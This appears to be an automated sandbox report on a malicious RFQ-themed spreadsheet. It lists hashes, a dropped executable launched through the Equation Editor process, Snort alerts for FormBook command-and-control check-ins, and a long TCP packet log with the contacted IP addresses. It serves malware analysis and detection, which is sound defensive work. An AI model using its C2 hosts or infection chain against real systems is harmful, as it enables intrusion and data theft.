                                              SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                              SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                              SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                              Malicious:true
                                              Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                              C:\Users\Public\vbc.exe
                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):538624
                                              Entropy (8bit):7.1421525751651425
                                              Encrypted:false
                                              SSDEEP:12288:aWHCM2K4CXmePITM0KbDAa8p0MQRqPbPJ3jNWAYH+jbRX2t:23CXXPIQ0gvM9DxtYH+92
                                              MD5:A3F424F32B637CB917E6596FAE56E401
                                              SHA1:9FF12D1CFCA13F94EEDBEB016974ECAE44B56266
                                              SHA-256:32258A09DDCB62EA68D47261889D0E888723AFBAB1BC4A3F137EC2E3C0DC01D4
                                              SHA-512:F238DD5F32E4D862C19F40B5264F0093DD6BBA251DB6FF68FD42D9BE8331111661781DDAB85E0DE3FE4F9B6A919E15782855EE329FE8CCAFB3641523FF0BA0C5
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................0.............jM... ...`....@.. ....................................@..................................M..O....`...............................L............................................... ............... ..H............text...p-... ...................... ..`.rsrc........`.......0..............@..@.reloc...............6..............@..B................LM......H........?..._......o.......P...........................................~..$}......}......}.....(......*...$}......}......}.....(........}......}....*...0..O.........$}......}......}.....(........{....}......{....}......{....}......{....}....*:..{....(.....*...0..w..........R.{........,f.r...p(....-).r!..p(....-%.r-..p(....-%.r9..p(....-%+0..}....+'..J.{....XT+...J.{....XT+...J.{....XT+.*..0...........rE..p.+..*..0...........r...p.+..*..0..................+..*".(.....*....0..

                                              Static File Info

                                              General

                                              File type:CDFV2 Encrypted
                                              Entropy (8bit):7.987872651324991
                                              TrID:
                                              • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                              File name:(RFQ) No.109050.xlsx
                                              File size:596992
                                              MD5:34cc835409afb805f20b811796d3b1fd
                                              SHA1:90b0fe9c48bb9915e2202e905baa3029ebc6f541
                                              SHA256:bb916fab1615d4fab5ba566bd01d7d89eb13c586d8ece170b556f7fc8437658c
                                              SHA512:e9d0366bf5beceead9fa2c1a6895ab9a74a214a9fded46ce1021e1254c6eafb4c6db3c0d55eae94896edbe41de02aa9e7bf76f1dcfa0cd092de4b544c0bb1ac1
                                              SSDEEP:12288:lm/+veTAqlDk+dodQ9TdIXpyXngu5RR7dc4/uwUR+A4hFYSAj542ds4Ca6:02eTA6fw2dTXngu5RR7hA4rTg4264L6
                                              File Content Preview:........................>......................................................................................................................................................................................................................................

                                              File Icon

                                              Icon Hash:e4e2aa8aa4b4bcb4

                                              Network Behavior

                                              Snort IDS Alerts

                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                              09/15/21-11:43:28.657859TCP2031453ET TROJAN FormBook CnC Checkin (GET)4916780192.168.2.2234.102.136.180
                                              09/15/21-11:43:28.657859TCP2031449ET TROJAN FormBook CnC Checkin (GET)4916780192.168.2.2234.102.136.180
                                              09/15/21-11:43:28.657859TCP2031412ET TROJAN FormBook CnC Checkin (GET)4916780192.168.2.2234.102.136.180
                                              09/15/21-11:43:28.772925TCP1201ATTACK-RESPONSES 403 Forbidden804916734.102.136.180192.168.2.22
                                              09/15/21-11:43:39.395982TCP1201ATTACK-RESPONSES 403 Forbidden804916934.98.99.30192.168.2.22

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Sep 15, 2021 11:41:57.230140924 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:57.401886940 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:57.401978970 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:57.402611017 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:57.576512098 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:57.576544046 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:57.576561928 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:57.576575994 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:57.576673985 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:57.751707077 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:57.751804113 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:57.751828909 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:57.751878023 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:57.751900911 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:57.751923084 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:57.751945019 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:57.751966000 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:57.751998901 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:57.752055883 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:57.752060890 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:57.923682928 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:57.923718929 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:57.923741102 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:57.923765898 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:57.923780918 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:57.923789024 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:57.923810005 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:57.923824072 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:57.923837900 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:57.923846006 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:57.923856020 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:57.923857927 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:57.923876047 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:57.923880100 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:57.923901081 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:57.923902035 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:57.923916101 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:57.923923969 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:57.923933029 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:57.923944950 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:57.923962116 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:57.923969984 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:57.923978090 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:57.923993111 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:57.924009085 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:57.924015045 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:57.924032927 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:57.924050093 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:57.926304102 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.096196890 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.096235991 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.096261024 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.096282005 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.096301079 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.096323013 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.096344948 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.096362114 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.096365929 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.096385956 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.096406937 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.096417904 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.096429110 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.096443892 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.096451044 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.096452951 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.096471071 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.096478939 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.096492052 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.096493006 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.096512079 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.096532106 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.096549988 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.096554995 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.096570015 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.096575022 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.096590996 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.096592903 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.096611023 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.096615076 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.096632957 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.096633911 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.096653938 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.096656084 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.096676111 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.096695900 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.096714973 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.096718073 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.096734047 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.096739054 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.096751928 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.096756935 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.096774101 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.096776962 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.096793890 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.096796989 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.096812010 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.096817017 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.096837044 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.096843958 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.096857071 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.096888065 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.096915007 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.098982096 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.269525051 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.269563913 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.269587994 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.269613028 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.269637108 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.269660950 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.269681931 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.269699097 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.269722939 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.269740105 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.269756079 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.269772053 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.269785881 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.269788980 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.269804955 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.269812107 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.269815922 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.269819975 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.269823074 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.269823074 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.269825935 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.269829988 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.269843102 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.269848108 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.269861937 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.269865036 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.269877911 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.269877911 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.269893885 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.269895077 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.269910097 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.269913912 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.269925117 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.269932032 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.269942045 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.269953012 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.269957066 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.269972086 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.269973040 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.269990921 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.270006895 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.271704912 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.271732092 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.271744967 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.271760941 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.271781921 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.271800995 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.271820068 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.271845102 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.271856070 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.271867990 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.271879911 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.271883965 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.271888018 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.271908998 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.271915913 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.271928072 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.271933079 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.271945000 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.271964073 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.271965027 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.271984100 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.271984100 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.272002935 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.272005081 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.272020102 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.272026062 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.272042990 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.272043943 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.272063017 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.272063971 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.272078037 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.272083044 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.272109032 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.272121906 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.272133112 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.272156000 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.272177935 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.272209883 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.272213936 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.272217989 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.272219896 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.272310019 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.441473961 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.441513062 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.441533089 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.441556931 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.441581011 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.441602945 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.441626072 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.441649914 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.441875935 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.441910028 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.444844007 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.444885015 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.444952965 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.444977045 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.444999933 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.445034981 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.445061922 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.445086002 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.445108891 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.445132971 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.445156097 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.445178032 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.445200920 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.445224047 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.445250034 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.445274115 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.445293903 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.445317030 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.445339918 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.445360899 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.445382118 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.445400953 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.445425034 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.445446014 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.445466995 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.445488930 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.445508957 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.445529938 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.445550919 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.445569992 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.445593119 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.445616007 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.445635080 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.445656061 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.445676088 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.445696115 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.445715904 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.445736885 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.445760012 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.445782900 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.446100950 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.446135998 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.446140051 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.613452911 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.613488913 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.613512993 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.613533974 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.613574982 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.613660097 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.613666058 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.613667965 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.613821030 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.613847017 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.613871098 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.613888979 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.613905907 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.613907099 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.613933086 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.613957882 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.613976955 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.614099026 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.614101887 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.615890026 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.615953922 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.615983009 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.616017103 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.616027117 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.619035006 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.619074106 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.619101048 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.619143009 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.619168997 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.622251987 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.622283936 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.622308016 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.622335911 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.622360945 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.622386932 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.622411966 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.622437000 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.622462988 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.622487068 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.622512102 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.622514963 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.622536898 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.622555971 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.622566938 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.622575045 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.622579098 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.622579098 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.622586012 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.622589111 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.622591972 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.622594118 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.622596979 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.622600079 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.622601986 CEST8049165198.12.84.109192.168.2.22
